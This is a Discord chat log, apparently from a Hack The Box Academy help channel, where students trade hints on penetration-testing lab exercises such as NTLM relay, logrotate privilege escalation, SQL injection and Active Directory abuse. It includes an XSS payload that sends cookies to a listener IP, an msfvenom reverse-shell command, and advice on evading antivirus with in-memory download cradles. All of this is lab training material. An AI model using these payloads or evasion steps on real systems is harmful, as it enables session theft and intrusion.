#modules
which host are you in now?
hint dump the ||hash|| (also hint it's not ||sam||)
my apologies i thought you were doing 3rd question since you mentioned responder and you dont need responder for the 8th question at all use the above hint
Ah, its fine
Ive also looked into ||LSASS||, only found the password hash for m***c. Then I tried||Lazagne||, got ||nothing||
Or I got this when using LaZagne ||[-] Administrator not ok for masterkey f2235d17-8d2f-4b0a-946f-ae79226da87c|| but that told me nothing lmao
if you already found it why try a different tool? 🤣 also this is a bit too much spoiler
you have the answer right here
you can't do pth
if you have the cred try to do some password spraying
I believe you can
there is another method ||evil|| method
always ask yourself if there's a way around something before giving up on the route 😉
Good evening!
NTLM Relay Attacks:NTLM Cross-protocol Relay Attacks
Use impacket's SOCKS server to hold NPORT's relayed connections and abuse them to access the MSSQL service at 172.16.117.60; query the 'flag' table within the 'development01' database and submit the flag.
Ktonibul was able to implement the attack?
Gives an error message
[-] Connection against target mssql://172.16.117.60 FAILED: [('SSL routines', '', 'no protocols available')]
YOURE joking
I found that hash yesterday, like for Admin, but I couldnt RDP
So I was like, there is another way i guess
5 hours looking for that other way, already having the answer
gg
anyone else getting caught up in some of the examples they provide
how can you go through them if you dont have access to the victims machine yet
Hello, I am trying to do the splunk for windows attacks but i am a little confused on how to connect to the instance to run the splunk queries for the questions?
sudo su -
Become the admin user then run ntlmrelayx
Hi all, i'm trying to do Linux Priv Esc -> Log Rotate page. I have LogRotten compiled and running on the attack box. I've also identified which log to attack, however no file is created in the /etc/bash_completion.d folder when running the exploit. Any help here would be appreciated.
Edited: Added details.
has anyone completed the Malware Analysis Module "Code Analysis", I need a hint on the first question; I see where its calling sub_####8, and calling the RegOpenKeyExA , but cant find what key it is
when you run the exploit you need to add data to the log file simultaneously then only the exploit will start to execute and then you should get a DONE! message at the end of the exploit. If you dont get it you have to try until you get it and once you get it, it will take 5 to 10 seconds to get the shell
and also the exploit should be run in the victim machine not on the attack box
Thanks @undone narwhal. Sorry i misspoke, I am running the exploit from the victim machine. I'll see if I can speed up my write to the logfile. Thanks
Many thanks for the help! I did it.🙏
Finally 😄
So i've tried:
- moving the exploit command to the background and running a for loop to echo into the logfile
- multiple tabs switching quickly and pressing enter in each
- restarting the box
- running a forloop in a separate shell tab
- modifying the payload to be simpler, just catting the flag file and writing it to htb-student folder.
Still can't get a "Done" response. Can i DM you to see if i'm running the right commands?
See 0xdf's writeup on "Book", this is taken from that section
It makes way more sense once you see someone do it
Thanks i'll take a look.
sure
So it looks like all I was doing wrong was the order of commands. I should have written to the file BEFORE executing the exploit.
that 4 hours of my life i'm not getting back.
I don't think that's the issue, the exploit just needs to be running when it rotates, so I think writing before executing might have given more consistent timing
Nope. I literally just changed the order of my 1 liner for writing and executing the exploit and it worked.
first time
if it works it works 🤷♂️
same as the write up
been there and will be back there eventually 🫡
thanks for the nod in the right direction. I'll be honest though, stuff like this doesn't feel like a learning experience.
Module: Intro to Assembly Language
Section: Skill Assessment
Can I dm someone my loaded_shellcode and flag optimized. I feel like I have coded the right thing But im missing something
#cybermonday
Does anyone have any good resources they recommend to supplement the material in the Pivoting, Tunneling, and Port Forwarding module? I'm having trouble grasping the concepts from this module.
Well the AD module xd
Oh nice, does that module go over the concepts from Pivoting, Tunneling, and Port Forwarding in more detail? Would it make sense to try and tackle the AD module first and then come back to Pivoting, Tunneling, and Port Forwarding?
Hi y'all, I'm stuck in the Attacking SQL Databases section under Attacking Common Services module...
I could log in and grab the Databases but, when I'm trying to connect with the database I guess is the target database I got a message about the User is not able to access the target database
reading the forum I found a hint regarding a hash which really I'm not understanding correctly
do I have to connect thru the MSSQL with the hash as PTH or do I've to crack the hash?
Hehe, i was kind of joking, by this i mean that you have to do so much pivoting during that module you will just understand it
I tried the 'IMPERSONATE' identification process and not worked for me either
I don’t have a better resource for you but everyone loves Ligolo-ng for pivoting and that one sadly isn’t covered in the module. But it makes the experience very smooth
I need help bombarding a server

Can someone tell me what network mode should I put a vulnerable test machine on VMware Workstation?
bridged mode
you're sure? it's not host-only? I'm really confused of what i see on google
I don't want the vulnerable machine to access my home network or cause problems for my physical machine
both of them work
but if you want it to be realistic you should go for bridged network mode
then you should go for host only mode, minimal risk
Thanks
"realistic" is an interesting adjective here, because what network mode you use is dependent on how you want all of the VMs to connect to each other
but also a better question for #homelab-sysadm, verify in #welcome
Hey there, I'm a bit new to the discord and the academy but I seem to be a bit stuck in the linux fundamentals at the filter contents section if there's a better place to ask the questions please let me know, but I can't seem to figure out how to answer the questions at the bottom, and it seems like it wasn't covered in the module
I'm trying real hard to avoid just looking answers up, as I'm actually trying to learn!
Here's this also if it helps
what have you tried so far
If I'm honest, I'm not sure where to start with these
I'm not sure how to see 'listening services' on linux
you already have the ||ssh|| credentials
Right, let me ssh back into the box rq
hint: ||you can use the netstat command with some options to find all listening services on the machine||
also, while I'm at it, to connect with my vm to the target, I've been downloading the vpn file and then using cp to copy the file to another directory I made with mkdir called HTB/ovpn/ and then sudo openvpn (.ovpn file)
is there an easier way to do that?
or am I doing that the right way
and that's necessary to ssh in right?
you have to be connected to the htb academy ovpn file to interact with any of the machines if that’s what you’re asking
I was pretty sure about that, we're good
Okay, I just tried ||netstat -l | grep -v localhost | wc -l || I'm not sure if grep really applies here though, my output was 113, but it said it was wrong in the question
without grep it outputs 118
don’t forget the question mentioned not on ||localhost(127.0.0.1)|| and ipv4 only
which means you should exclude that address
I'm sorry, still a bit confused, I just tried || netstat -l | grep -v 127.0.0.1 | wc -l || which returned 118, after that I tried that I used || netstat -l | grep 10.129.120.7 | wc -l || which returned 1 and the answer still seems to be incorrect. I've checked netstat and didn't see much info about excluding certain addresses so I tried it through grep, also, I just tried ss and it seems like it's a bit easier to exclude certain types of values but I'm really lost there too, I tried || ss -l -4 || and it showed a list of tcp/udp connections but the amount didn't check the question off either edit: netstat was 2x
that’s because you’re using an incorrect netstat command
you need to follow what the question said and find all the services LISTENING on ALL (-||a||) interfaces and ipv4 addresses only (-||n||) excluding the localhost
So, I'd need || netstat -l (listening) -a(for all sockets) -n(and n? so it doesn't resolve names?) i've still kept the | grep -v (to hide or exclude) 127.0.0.1||
or is that still wrong :3
you don’t need to use the -l option when using -a
Oh okay, they did return the same word
The only problem is that it's still saying it's wrong
||grep LISTEN||
OH SHIT
don’t forget that
damn
|| htb-student@nixfund:~$ netstat -a -n | grep -v 127.0.0.1 | grep LISTEN | wc -l ||
104
I've still got a big oof, it's still wrong
I dunno man I don't think so
I'm dyin here
I only had the wc -l to count em but, it still didn't return the right amount either way
do you want to see the output?
i think this should work ||netstat -an | grep -v 127.0.0.1 | grep -w LISTEN | wc -l||
@coarse bay
you haven’t spawned the target system
delete this
oh thanks
okay what about ||grep -w LISTENING||
Okay, I think I'm just going to try and find the answer, I think i've got a good understanding of how to use netstat now LMAO, but would you mind attempting to help on the next two and then I'll leave you alone
it returned 0 btw
I think we were on the right track though, but the answer I found was this || ss -l -4 | grep -v "127.0.0" | grep "LISTEN" | wc -l ||
my bad
it doesn't show it but there are \ before the .0's
It's okay we're suffering together
hint: for the next question you have to use a command to list all the currently running processes on the machine
for all users
okay, I tried || jobs || but it didn't seem to return anything
I tried || jobs --h and also man jobs ||
still nuthin
have you tried the ||ps|| command?
OOPS
Okay
Prolly doin this wrong again but hey! || I've tried ps -e to show all the processes, and I can't find a ProFTP and then I realized it needed it under a certain user, so I did -u to show users, but it only shows htb-student||
also sometimes it doesn't let me type anything in the console and I have to re-ssh in, did I do somethin wrong
it’s probably just a timeout
ah okay
for all users
Okay, good news
I found proftpd with a grep like this || ps a -e | grep "ProFTPd" ||
but the user isn't shown
oh waity
okay nvm
Also, this was the output from that
to see the user who started each process you can use the ||-u|| option
that gave an error about syntax
error: list of users must follow -u
Usage:
ps [options]
Try 'ps --help <simple|list|output|threads|misc|all>'
or 'ps --help <s|l|o|t|m|a>'
for additional help text.
For more details see ps(1).
try ||ps -aux | grep ||
wait what's the x
|| htb-stu+ 6505 0.0 0.0 13144 1076 pts/1 S+ 23:16 0:00 grep --color=auto ProFTPd||
to list daemons and other backgrounds processes
ah okay
Just to put it out there, I tried putting in the basic username of htb-student and it didn't work
from the last output
did this work?
It wants the username, I just tried the abv. version htb-stu+ but it didn't like that output
Okay I tried something for shits and giggles, and I'm more confused now
I tried putting in || ProFTPd || just to see if it'd work
and it completed it
but I'm left more confused now because the question is asking for the user that process is running under
try this ||ps -e -o user,cmd | grep||
so technically shouldn't it be htb-student?
I think you meant to put ProFTPd at the end so I added it, and this was the output || htb-stu+ grep --color=auto ProFTPd ||
just read the proftp configuration file in etc to see the username😭🙏
My man, you have done nothing but confuse this guy more, with this awful advice.
DM me, and I'll help you with the mess he made.
Thanks for trying dog
anyone who has done Attacking common services - SQL Databases....!!!!
I am not being able to enumerate the database
All of the commands you need for that section are in the text, it's a matter of recognizing what kind of SQL you're working with
can DM to you?, cuz the command applied are not working
identify the SQL is self explained in the password
with not being able to enumerate the database I mean use the database, I could crack the password from the hash but I'm not able to log in with that user|password
anyone has an idea why this message error
||sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
Msg 18452, Level 14, State 1
Server 'WIN-02\SQLEXPRESS', Line 1
Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
Open Client Message
Layer 0, Origin 0, Severity 78, Number 34
Adaptive Server connection failed
Open Client Message
Layer 0, Origin 0, Severity 78, Number 34
Adaptive Server connection failed||
You are supposed to add the two bitmaps. So, 512 + 128 = (ANSWER)
who has done attacking common services | attacking SQL databases, could please let me know if this command worked for you ||sqsh -S 10.129.203.12 -U \WIN-02\mssqlsrv -P 'pxyz...1' -h ||
o.O
Nice cat
(^o^)/
trying to import powersploit in the target machine by ssh
i was able to do it in my local windows vm but its giving me error in the machine , dont know whats wrong
blocked by AV
what can i do now to solve it then
obfuscate it or disable av i guess
Use a download cradle that executes it from the memory...look in the file transfer module for a powershell command that starts with "IEX"
i dont think it was suppose to be that hard
Module: Linux Local Privilege Escalation - Skills Assessment
i'm trying the optional way. I have a reverse shell already. What should i do to escalate the shell?
Saw a DB and inside only got 1 user which is already used to login into W*
anyone can drop any hints?
In ICMP section of Pivoting module I get error when trying to start ptunnel server on pivot host the error is
```
./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.36' not found (required by ./ptunnel-ng)
./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./ptunnel-ng)
```
i was trying the nmap medium lab for firewall evasion. To find the dns server version, i used the nmap -sSU -p 53 --script dns-nsid <target ip> but still its not showing the version. Did anyone face it
Hi everyone. Module : "Attacking Web Applications with FFUF" i'm at the "skill assessment part1. It asks for the page that says 'you don't have access' ; i'm using FFUF but just to understand if i'm doing something wrong ; ffuf returns me with
```
________________________________________________
.php [Status: 403, Size: 287, Words: 20, Lines: 10, Duration: 16ms]
index.php [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 16ms]
[Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 17ms]
[Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 15ms]
.php [Status: 403, Size: 287, Words: 20, Lines: 10, Duration: 15ms]
:: Progress: [175302/175302] :: Job [1/1] :: 2589 req/sec :: Duration: [0:01:14] :: Errors: 0 ::
```
but i don't understand why it shows 'status 200' pages but no names, nothing.
any hints or suggestions or whatever would be much appreciated. few days i'm on this and can't figure out what's going on.
nevermind... i'm just dumb i guess 😄 Found the reason 😄
Module "Active Directory Enumeration & Attacks" -> "Skills Assessment Part I"
After I kerberoast and crack the hash for a service-user password, bloodhound hints me towards a host where I have sqladmin rights, but the hostname ist not known by the DC. Also the next questions asks about MS01, which does not seem to have any connection to the service account I got. What am I missing here?
Edit: Nevermind. Bloodhound seemed to miss something
SQL INJECTION FUNDAMENTALS --> Writing Files --> Find the flag by using a webshell.
Someone can give me a start? I cannot figure out how to solve this one.
if you are new here read #welcome and #rules and if you are on the academy here is how modules work
https://help.hackthebox.com/en/articles/5297528-introduction-to-modules-paths
only tier 0 module are free
first check the 3 requirements shown on top of the section
did you do the step Building Ptunnel-ng with Autogen.sh on your machine? if not then that's the issue
which question are you on?
which module are you on? also try powershell -ep bypass before you import powerview also try to disable defender if it is running
In Attacking Common Applications - Assessment I, I ended up getting the flag in a round about way, but the question says to obtain a shell... anyone got a hint on how I could do this?
i have completed all 5 flags.
But i wanted to try the optional way without using the SSH credentials.
I got a reverse shell through ||WP||, but am unsure of how to proceed from there
i dont need any flag to continue , but i wanted it to install in on host machine for practice
Done that, got them all three, can write and read files but have to find out how to know the file i am looking for. Now experimenting with load_file()
hey guys I stuck in Union Clause from SQL Injection module every command with UNION i write it say its wrong
i need help 🙂
What have you tried
||```
MariaDB [employees]> SHOW TABLES;
+----------------------+
| Tables_in_employees  |
+----------------------+
| current_dept_emp     |
| departments          |
| dept_emp             |
| dept_emp_latest_date |
| dept_manager         |
| employees            |
| salaries             |
| titles               |
+----------------------+
8 rows in set (0.093 sec)
MariaDB [employees]> SELECT * FROM employees UNION SELECT * FROM departments;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
```||
Can anyone help me with this question
SQLMAP ESSENTIALS
Attack Tuning
What's the contents of table flag7? (Case #7)
sqlmap http://IP:PORT/case7.php?id=1 --union-cols=5
That's my command but it doesn't work. Can I get any help please
Did you google the error?
jezz...that debugging section in malware analysis module was a beast
instructions were sort of hard to follow---took me a couple of times
look about right (hence you should remove the command due to spoiler 🤣) but try adding the --dbs tag just for a sanity check to see whether or not it's work
not sure what you mean by that but if you can write file just write a shell or a command that cat the flag into a php file and run it
pls ask your questions here first before ping a bunch of people
not sure what services did you get a shell as but i'm pretty sure if it's unintended there won't be a path to PrivEsc
with that being said there is some unintended ||vuln|| that can give you root instantly
bruh these thm mods
I just asked them how to install Powersploit through Powershell and they asked too many questions like where it is, and what u doing in the end, they said We can help you.

I've been stuck for a while in LOGROTTEN in Linux Privilege Escalation, probably i'm doing something stupid but I can't get it through, can you tell what i'm doing wrong?:
COMMANDS:
TARGET: ./logrotten -p ./payload ../backups/access.log.1
which gets this when modifying file...
Waiting for rotating ../backups/access.log.1... Renamed ../backups with ../backups2 and created symlink to /etc/bash_completion.d Waiting 1 seconds before writing payload...
ATTACKER: nc -nlvp 9001 listening on [any] 9001 ...
If you already have the knowledge from the Information Security Foundations path, then you can start directly with the CPTS path
i found this https://stackoverflow.com/questions/3655708/error-the-used-select-statements-have-a-different-number-of-columns
but i dont understand
first in a different terminal did you run something like echo "test" >> backups/access.log? also pretty sure this doesn't matter but did you try with the access.log file instead of access.log.1
To do the union select you need to make sure the amount of columns are the same
In this case employees has 6 columns and departments only has 2
In the section it shows what to do to “fill up” those columns it doesn’t have
where
In the section…
I cant find it and in the question or other ways it dont show what to do in this situation
1,2,3,4…..
Hi
looking for a hint with this? "What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word) " in ACL Abuse in Active Directory Module
I'm in bloodhound looking at the actual rights and the answer of ||Generic-Write, GenericWrite, Add-Self, AddSelf|| is not working unsure of what I am doing wrong
or does this want me to provide the non-human readable GUID as an answer?
I've tried the filtering part, unsure what I am doing wrong
Hello, wondering if someone can help me with that Antak module
on the first question "Where is the Antak webshell located on Pwnbox? Submit the full path. (Format:/path/to/antakwebshell)"
On the Windows box it is " C:\inetpub\wwwroot\status.inlanefreight.local\files\Upload.aspx"
Holy expletive
Its /usr/share/nishang/Antak-WebShell/antak.aspx
Talking to myself on this helps me solve the module myself, thank you!
can I get some help with the logrotate exercise for linux priv esc?
I'm running logrotten, and I'm appending to /home/htb-student/backup/access.log
my payload is supposed to pop a reverse shell back to me, log rotten executes successfully but I don't get the shell back, what could I be doing wrong?
if I want to start bug bounty which modules should i complete first ?
the CBBH path
im on this right now
you are on the right track then 🙂
oh good thanks
but i mean i should complete all of them to be able to find my first bug
or i can be more specific and earn the next month payment
?
Expecting to get money from bug bounty while youre new is optimistic
hmmm
how it works then ?
so its not possible to found the old bug ?
like in the hacker1
i think madf0x means that it’s hard to find bugs, especially as someone new with little to no experience. There is also a lot of competition for the big companies with big payouts on hackerone, and as someone new it might seem impossible. Not to mention not all companies on hackerone (and other platforms) offer a bounty.
competition for pub bounties are pretty massive
^^
if you're gunna go bug bounty hunting be pleasantly surprised if you even find anything, more surprised if they actually accept it and even more surprised if they actually pay out for it
i can’t speak for the CBBH path and exam, but i’d start there and then maybe do the web based challenges and content on the main HTB platform
A lot of successful bug bounty hunters are either A. Incredibly skilled B. Got connections for Private bounties C. grinded out a lot of freebie bugs over time till they started getting invites to private bounties or D. Combination of the above.
Another thing is that complete the H1 CTFs and they will invite you for private program that can be little easier after than it is pure skill and analysis. You vs the scope if target
What do you mean with old
First come first served
hello y'all, who can give me a hint with the last question of attacking rdp section under attacking common services module?
I'm being not able to find any information|reference about administrator to grab their hash
I tried with responder, but I just could find the regular user shared in the exercise
the target machine is running Win2019 and the RDP Session Hijacking explanation according the material, this method NOT longer work in W2019
Low effort troll
Can I DM someone about Attacking DNS in Attacking Common Services?
What about Pass-the-hash?
I mean like finding a simple sql bug
I know PTH is the way to grab the flag, but I need to find/obtain the hash first I'm gonna try to dump the SAM db
You have solved #1 🙂 take a closer look at the only file available
Overcomplicating
LoL x1k, I saw the file but not opened, 1 more time LoL, ty dude
is it possible to get CBBH certification in one year or less and know the material really well?
IMO follow your curiosity. Do not think of learning as a checklist, where you've spent 8 hours reading about X and are now ready to move on. Taking the time to truly dive-in and digest the content, I suspect you will think you yourself "but wait, how does THAT work?..." Keep exploring until you find the answer. Usually it leads to another question 😉
This I believe leads to true learning, and it's difficult to give a time estimate for.
Guys, I am in windows attacks and defense, trying to open this machine but it is not working
Has anyone else been having trouble starting Pwnbox instances, even with a paid account? Happened while demoing the academy to try to get some grant money to buy subscriptions for the students. 😢
Me tooo
Is there any issues with a website?
let me look into it 💪
if I'm not gonna do the CREST certification because I'm in the US, is it still worth it to do CREST skill paths in order to gain more advanced skills in the future?
I think the error from the exact website!
I hope they can fix it soon
how worth it are CREST modules without the cert?
finally finished that malware analysis module--fun stuff
CREST is becoming more recognized in US tho
https://www.pivotpointsecurity.com/how-crest-professional-certifications-compare-to-other-industry-qualifications/
The CREST modules are just taking existing modules in the academy and putting them in a path, with possibly a few made specifically with CREST in mind
CPTS and CBBH is all in that path iirc but not 100% sure on that
Try refreshing the page and trying again. It started working for me just now.
Worst time for that to happen lol
right that's what I observe too. I'm thinking if I do CREST paths as I do HTB Academy and Main Platform, I have some structure to try to get more advanced hacking skills. That's my hope anyways. I want to be able to do advanced or hard main platform boxes on my own eventually.
or if CREST does become valuable in US to get certified
because it looks like a better cert than OSCP
could make employers take me very seriously
Follow whatever path you want based on what skills you want to develop 🤷♂️
honestly man it feels like you spend too much time minmaxing what you should focus on learning instead of just going out and learning it
right but I'm wondering if CREST path actually gets you advanced enough skills to get CREST or if it at least gets you enough skills to do advanced HTB boxes
ok ya I do overthink stuff
Just learn.
ok
Once you do some basic learning, you will find what areas you want to improve on
I mean some overthinking is good but at the end of the day its not gunna teach you how to do LFI until you start just learning LFI ya know
But you need to take that first step before trying to min max
ok got it thank you good idea
I spent some time on Nmap module today
working through CBBH and CPTS
lmao gonna finish CBBH first so I can bug hunt and have income sooner lmao
but CPTS is also fun
but gotta work on Nmap first
I think Nmap is valuable for bug hunting so doing this one module and some main platform boxes
Do not count on bug bounty as sure fire income unless you’re goated on the sticks
Just wanted to make sure before you get extremely frustrated when you start trying 😅
I know thank you for your concern
its not even small, youre really not going to get an income whatsoever doing bug bounties
ok got it point taken
it takes a lot of factors to make money from bug bounties and skill is only one part of it
in the Laudanum, One Webshell to Rule Them All section, the module mentions that the webshell gets uploaded to (double backslash slash before "files")\files\ directory. but when we upload the webshell , it says that the webshell is uploaded to C:\inetpub\wwwroot\status.inlanefreight.local\files\shell.aspx. so why does the course material state that its uploaded to (double backslash before "files" )\files\ ?
hello, everyone know what the differences of using -windows-auth and without using this option?
hi guys im doing the shells and payloads (the live engagement) im strugling to make a war file somehow my kali dosent have jar command anyone able to give a hand please and thanks
Has anyone been working on blockchain challenges ? I have a quick question
ATTACKING COMMON SERVICES: Attacking SQL Databases
Question: What is the password for the "mssqlsvc" user?
Logged in with : mssqlclient.py -p 1433 htbdbuser@<ip>
Checked tables of the master, tempdb, msdb databases but found nothing regarding this.
Where am i supposed to find the user and password tables in this?
+1
read #welcome and #rules after that use /verify at #bot-commands and ask that at #challenges
the jar command is just java if your kali doesn't have it just install java also you can use msfvenom for this and i think the section does show some method about using zip to war file with anther shell
hint there isn't anything in the DBs, try a different method showed in the section
thanks i realised the error in my ways 😄
why does xfree rdp give me a black screen on this module - https://academy.hackthebox.com/module/143/section/1485
I have rebooted my vm, reverted that vm, and did all the usual troubleshooting.
If I use remmina it works
here is the command I used - xfreerdp /v:10.129.27.59 /u:htb-student /p:Academy_student_AD! +clipboard /cert:ignore
Press enter, VM is in an energy saving mode or something
Still doesn't work, tried all of that
wait, lol it worked, Oh I wish I could just delete everything I just posted
Yep
I mean, you can
yeah but your responses wouldn't make sense
That's what makes it funny
But tbh you're not the first, and probably not last, person that's run into that
Yeah, I thought I hit enter, I probably did but without that screen in the foreground.
Hey guys, I got stuck in the skills assessment. Could you help me.
when I'm using that cookie I'm unable to login as admin.
||auth-session=s:qPppmnahd3mYZhS3ihr6GzND0F_61XgV.8TrV0JwCrXeURX4J588m3AOzzH4RQ76PHS0RCbscSH4||
I obtained it by using payload:
||<style>@keyframes x{}</style><video style="animation-name:x" onanimationend="window.location = 'http://10.10.15.59:8000/log.php?c=' + document.cookie;"></video>||
hi can i use the vpn of htb academy in htb boxes or is it two differents conf?
Two different services
ok tkx
Could you answer my question above
I dont know. Haven't done that nor do I even know what module you're working on.
The module is skills Assessment in session security
Yeah I haven't done this one
doing the password attacks module atm but damn shit is slow
Yep that's mostly intentional
Setting hydra threads to 48 tends to be the most stable
Biggest tip for password attacks: save all passwords you find. This module reuses a fair bit
oh, good to know
ill get on that after this one, im currently trying to get the sam user but ive resigned to just waiting a little longer
If I recall a section further in the module directly tells you to use the previously cracked password for another user
imagine if we had to bruteforce the username sam as well
OK so tip: did you use the pws.list and custom.rule from the resources download?
Good morning
I am on "The Live Engagement" module
and am trying to simply open a web browser on the Foothold machine
to open up the webpage on status.inlanefreight.local
Is there a command that I need to run, I dont see firefox or any browser that I can use
I tried the command xdg-open but that just opens Pluma
Can anyone help me?
i did, yeah
just took ages
but ive got it now 👍
That's good :) I hope you weren't bruteforcing ssh and did the other available service
Can anyone point me in the correct direction, I am asking chatgpt with no good answer other than the xdg-open command which only gives me text
Type firefox in the terminal
This question has been asked a bunch of times here
Well, we appreciate it
you can also use burp’s browser, that’s what i ended up doing
anyone i can dm to discuss about an error ?
What is it about?
Just ask here
need help on Attacking Common Applications module: osTicket...
i got where to login but i can't find credential to login for Customer or Agent user
A screenshot of the question would be nice
Hi Guys still at the shells and payloads second host . i got as far as giving it the payload with metasploit but i get an invalid json response and it exits after it and never runs shell
hint check the example, the cred part did have a note that the data is fictional so (i think) there is no intended way to get the cred for this on your own
Make sure you set the options correctly
I have tried everything i can, i also follow the example except the dehashed one, so the cred is on simple list right? can I brute force it?
no the cred is in the example 🤣
ughhhhhhhh I GOT IT!, my 12hours is gone for nothing hahahahaha, I'm sure that i tried that cred in the example but its not work
thank you very much bro
Can someone give me a nudge on Windows privilege escalation: credential hunting? I've got several files containing passwords, and none seem to be the right answer. Not sure what I am missing here.
Which pass do you need and what files did you get
Hello - I am stuck on "The Live Engagement" specifically 'Exploit the target and gain a shell session. Submit the name of the folder located in C:\Shares\ (Format: all lower case)'
I have run the following msfvenom command to create the war payload and uploaded it - the IP address I see of the Foothold is 172.16.1.5
msfvenom -p java/jsp_shell_reverse_tcp LHOST="172.16.1.5" LPORT=4343 -f war > reverse.war
I am able to upload the reverse.war and deploy it then run a listener on the Foothold (sudo nc -lvnp 4343) but do not get a connection
good day friends, i am at Attacking Common Applications Attacking Splunk, i think in inputs.conf i have to change rev.py to .ps1 , so i did but i still cant get a rev shell
am I correct so far here any advice on what direction I should be looking in is super appreciated
i now have a bin dir with rev.ps1 and run.bat , and have a default dir with inputs.conf
Is anyone able to help me with a question from the Pass the Hash module in Password Attacks? I have David's hash but when I connect to the share, I don't have permissions to go into the "david" folder.
Thanks in advance ^
try Pass the Hash from Windows Using Mimikatz.
I am RDP'd in as david
Wait, I see what you mean now thanks!
Tried that, still getting access denied
Have you solved ques 1 and 2 ?
dm me
ok, thanks 🙂
Hi, are there special chat tab that I am allowed to get some advise or someone can PM me an we can address somethings
any compassion can do all I want is your support my soul is lost I need direct answers
read #welcome and #rules after that use /verify at #bot-commands to get access to more channels
I did
long time ago Im exhausted by everything
I dont want more bureaucracy, but it said "to mention in chat if you want someone's help, you are not allowed to PM directly"
that's the only rule I remember
i mean verify your account with your HTB account
ask a therapist on betterhelp
huh????
no idea if you have mental or technical issue lol
Hi guys!
your name is still white so no you didnt verify your account
when clicking your payload did you get redirect to a directory with your payload name? if not then your payload probably didn't execute
oh wow that guy has sent 100+ messages here and it's all bs and unrelated to the academy
How is this not the answer to the last question - https://academy.hackthebox.com/module/143/section/1485 or it's ||Generic Write||
it will not accept either answer
thats the colloquial name. it wants the actual Object ACE name
bloodhound isnt gunna be useful here
ah gotcha
ty
powershell isn't doing anything - I have the SID converted but it won't budge
No error either
keep waiting based on this - Note that this command will take a while to run, especially in a large environment. It may take 1-2 minutes to get a result in our lab. ?
I just did this one. You just need to be patient.
where can i get lazagne standalone for linux
the one from the repo needs requirements to be installed and i cant do that because i dont have internet on the target
you can just run this one - https://github.com/AlessandroZ/LaZagne/releases OOB no requirements AFAIK,
How patient? It's been like 7+ min
You could try to be more specific with the Identity, If you know the exact one you are looking for Otherwise you'll need to be very patient
Good idea about the -Identity
It took me like a solid 20 minutes at least haha.
no kidding lol okay, I don't feel crazy. I thought I needed to reset the machine
any help please, i am stuck
||Get-DomainObjectAcl -ResolveGUIDs -Identity "CN=GPO Management,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL" | where {$_.SecurityIdentifier -eq $sid} -Verbose||
Hey guys, is there any module that teaches how to setup a linux distro? Sorry, am new 😦
Or just Youtube if you like to learn that way
Thank you so much! I just started my training and was wondering where was this taught
No problem Happy Hacking !!
Don't know if there is a "suggestion" box outside of this channel, but I would like to suggest adding a ligolo-ng section into the "Tunneling and Pivoting" module... To whom should I direct such a suggestion?
Each module lists who the writer is, on the first page.
🤔 Good "suggestion."
For the pivoting module,
Co-Authors: TreyCraf7, LTNB0B
Yep, found it...
@mellow whale How difficult would the above suggestion be? (Assuming this is you...) Couldn't find that Chetan-8.
please can anyone help me on attacking dns section of common services module...
hey @warm drift what's up, what kind of help are you needing?
hey, I was wondering if I can create a module in HTB Academy and what are the terms and conditions?
I connect to user|| "wley" in my PowerShell session|| but I can't ||force change the "damundsen" ||user's password. Anyone run into this issue in this section. The user clearly exists. https://academy.hackthebox.com/module/143/section/1486
Maybe use 'UserPrincipalName' as the identity?
why doesnt the options method show me the allowed headers?
hey does someone know a linux command to url encode a string?
Module 134 aka Web Attacks, under the section of Advanced Exfiltration with CDATA, the example given to read the file contents of submitDetails.php. Does this example given work in the lab system given for that section. I have the flag already, however I can't get the example to work as it was given. Multiple people have had this issue in this forum, I have yet to locate what I screwed up. Any suggestions would be greatly appreciated.
any one have an idea what could be wrong here?
try it on ||index.php|| it will work
You my man are MVP! It is working awesome.
anyone can give a hint how to use telnet with username and password?
Windows Privilege Escalation Skills Assessment - Part I
I can't use wget, Invoke-web, certutils... to get the nc.exe to the machine and execute a reverse shell
Please, any help, ideas... 🙏
hello, i'm doing the skill assessment of the file inclusion module, i have found the flag file but i cant find the root path, i have tried a lot
you can just telnet <IP> <PORT> then it will ask for username and password if it's set up that way
Hey, not sure what you're asking here... the root path should just be / i.e. /flag_xxxxx.txt
I figured it was because I have to download it to C:\Windows\Temp, but certutils is failing. Anybody know why? this shouldnt happen, another student replicated it and worked for them
Try to use these with powershell, they will work
no the root directory of the file system
the root directory of the filesystem is /. cd /... its where etc, var, opt etc. all are
i have tried with ffuf, it gives me this but it doesn't work: /var/ww/html
oh the webroot?
yeah
now i have this
Tried without success 😢
can you try a powershell revshell from revshells.com?
yeah thats the way... so if you're using ||log poisoning|| for command execution, you should just be able to do cat flag
Try wget
i have tried this lot of time (but iam so idiot thanks @fringe shell )
it took me a while to get this as well... if you still need more help, feel free to dm
No success @fringe shell @undone narwhal 😭
Hey guys, how are you doing? Im having problems with the final assessment from stack based bof on windows.
I already got the right buffer size, the jmp esp address and the bad char.
Somehow my exploit seems to do it well (looking on the debugger, setting a breakpoint on the JMP ESP and stepping into it looks good).
But I'm not getting the reverse shell on my local PC.
Someone can help me? Thank you in advance.
Exploit + details:
hey, i just had a look and you're not supposed to get a revshell... you gotta do some hunting for creds, then you can use those creds on another port
i think i always did... if it wasn't already stashed on there in a "Tools" folder or something. Haven't used the load kiwi function, so can't help there.
ty
can anyone help me on attacking common application :section IIS tilde enu part?
you can run the "Generate Wordlist" part and then "Gobuster enumeration" pretty much verbatim and it should work
ya, and i did and gave 1 output being the obvious answer and isnt accepting as correct.
@fringe shell can i dm you?
sure can
hi
anyone can help me with Password Attacks Lab - Hard in the password attack module? I'm stuck a few hours with brute force with Johanna user
which list are you using
i'm trying with password.list and mut_password.list
wow, i'll try
in rdp protocol?
yah
check pm
Hi friends. In this crack protected files section: https://academy.hackthebox.com/module/147/section/1322 The question asks me to log in with Kira's cracked password...are we suppose to hydra the initial access to the host? The section is about cracking protected file Idk where kira comes from.
